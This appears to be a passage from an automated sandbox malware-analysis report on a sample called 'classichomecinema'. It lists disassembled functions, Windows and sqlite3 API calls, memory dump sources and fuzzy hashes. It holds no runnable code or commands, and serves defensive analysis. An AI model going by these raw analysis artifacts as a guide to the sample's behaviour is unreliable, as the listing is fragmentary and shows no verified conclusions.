                                                                                        • Opcode Fuzzy Hash: e66dba9bc5a59dec1b9cdc0a82b5261c8e6dde639c67a711cb867eaa7357f7a8
                                                                                        • Instruction Fuzzy Hash: 1BB01230C08001D6CE000BC08A0481876315E01310322803396C3300E08A3D4409BA1F
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1889721586-0
                                                                                        • Opcode ID: f5a9a6cd0d3dfde358d1ed34cf1567730a744f26f3328395782056a37fe8e46c
                                                                                        • Instruction ID: ca83de31cf88e0f7b1adfe4b18ba6b195261e8afb7945e6c10c43b12717cba52
                                                                                        • Opcode Fuzzy Hash: f5a9a6cd0d3dfde358d1ed34cf1567730a744f26f3328395782056a37fe8e46c
                                                                                        • Instruction Fuzzy Hash: 01A00270914105EFCB104F659AC806CBEB5B648391BB1887EE04BF25A0DB3446CDAA59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID:
                                                                                        • API String ID: 71445658-0
                                                                                        • Opcode ID: 5eacc4ed5d6b71a6d6739c56d810addfd786f62a5f4c78bf6b01d583d0a40c8d
                                                                                        • Instruction ID: a1f870591d39bb6d8b96134987fb6292501960ea232182ac0741a513a4621017
                                                                                        • Opcode Fuzzy Hash: 5eacc4ed5d6b71a6d6739c56d810addfd786f62a5f4c78bf6b01d583d0a40c8d
                                                                                        • Instruction Fuzzy Hash: 08900220204101DAE2040A725A4821566D8660874572145395443E1161DA3480055929
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0610: OpenEventA.KERNEL32(00100002,00000000,00000000,04E612CA), ref: 00AC06B0
                                                                                          • Part of subcall function 00AC0610: CloseHandle.KERNEL32(00000000), ref: 00AC06C5
                                                                                          • Part of subcall function 00AC0610: ResetEvent.KERNEL32(00000000,04E612CA), ref: 00AC06CF
                                                                                          • Part of subcall function 00AC0610: CloseHandle.KERNEL32(00000000,04E612CA), ref: 00AC0704
                                                                                        • TlsSetValue.KERNEL32(0000002B,?), ref: 00AC11AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandle$OpenResetValue
                                                                                        • String ID:
                                                                                        • API String ID: 1556185888-0
                                                                                        • Opcode ID: 544f75488d2f826cfd534f392688e58bbab03cd7d30ae3dbcbfbc274844ed6ca
                                                                                        • Instruction ID: 69e4ad5a1763c499df4fb58a7004d71cefcd62cb64fab8d75f71a482374ba47e
                                                                                        • Opcode Fuzzy Hash: 544f75488d2f826cfd534f392688e58bbab03cd7d30ae3dbcbfbc274844ed6ca
                                                                                        • Instruction Fuzzy Hash: 3B018B71A04648EFC710CF99DD45F5ABBA8FB09770F104B2AF825D7380D775A9008BA0
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000040,00409068), ref: 0040D0F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9e0ac0af364bcf308370d120fd539e398a1cb38d8b3d6c89812f58aa12c3aa18
                                                                                        • Instruction ID: 6bf2a068bfca1c8f86339732706a30905d399dbcba2ad77db48a53c6abb8bc1c
                                                                                        • Opcode Fuzzy Hash: 9e0ac0af364bcf308370d120fd539e398a1cb38d8b3d6c89812f58aa12c3aa18
                                                                                        • Instruction Fuzzy Hash: 6F018F30A01209AFDB04DF98C859BEEBBB4EB04310F10406AB655B76C1D378A945DB16
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: af258db13700fd9185a0206c61946e01d9dbc35cdb0cb0c98d9fd85e272a22aa
                                                                                        • Instruction ID: c0f68ce38cdc4fabbd5a2d72d20c4ce279d657f5bf4ba57cb2acef1ece1c22d5
                                                                                        • Opcode Fuzzy Hash: af258db13700fd9185a0206c61946e01d9dbc35cdb0cb0c98d9fd85e272a22aa
                                                                                        • Instruction Fuzzy Hash: 05B01230D44200DBD24057E0CF44A3C36749710300F100167E522B71D0CF381A45550F
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: d8ab2787facf2e2e3614e7dcd922b2cf540d4d131cdf778710a0da2ab63d60cd
                                                                                        • Instruction ID: 7353c5f7f151f97415b3cc1148ceb921584a2174ecfd3d22fe05316cc8b1a890
                                                                                        • Opcode Fuzzy Hash: d8ab2787facf2e2e3614e7dcd922b2cf540d4d131cdf778710a0da2ab63d60cd
                                                                                        • Instruction Fuzzy Hash: 7CA002609CD610C6E1485B907B59B2535306F00725F662137924BB84E14A7D550BBA5F
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                        • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                        • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                        • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                        • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                        • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                        • memcmp.MSVCRT ref: 60967D4C
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                        • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                        • sqlite3_free.SQLITE3 ref: 60968002
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                          • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                          • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                        • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                        • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                        • sqlite3_step.SQLITE3 ref: 60968139
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                        • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                          • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                          • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                          • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                        • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                        • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                        • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                        • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                        • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                        • sqlite3_free.SQLITE3 ref: 60969102
                                                                                        • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID: $d
                                                                                        • API String ID: 2451604321-2084297493
                                                                                        • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                        • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                        • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                        • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                        • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                        • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                        • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                        • String ID: optimize
                                                                                        • API String ID: 1540667495-3797040228
                                                                                        • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                        • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                        • sqlite3_free.SQLITE3 ref: 60966183
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                        • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                        • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                        • memcmp.MSVCRT ref: 6096639E
                                                                                          • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                          • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                        • String ID: ASC$DESC$x
                                                                                        • API String ID: 4082667235-1162196452
                                                                                        • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                        • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                        • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                          • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                          • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                          • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                          • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                        • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                        • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                        • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                          • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                        • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                        • String ID:
                                                                                        • API String ID: 961572588-0
                                                                                        • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                        • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                        • String ID: 2$foreign key$indexed
                                                                                        • API String ID: 4126863092-702264400
                                                                                        • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                        • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                        • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                        • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2794791986-0
                                                                                        • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                        • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
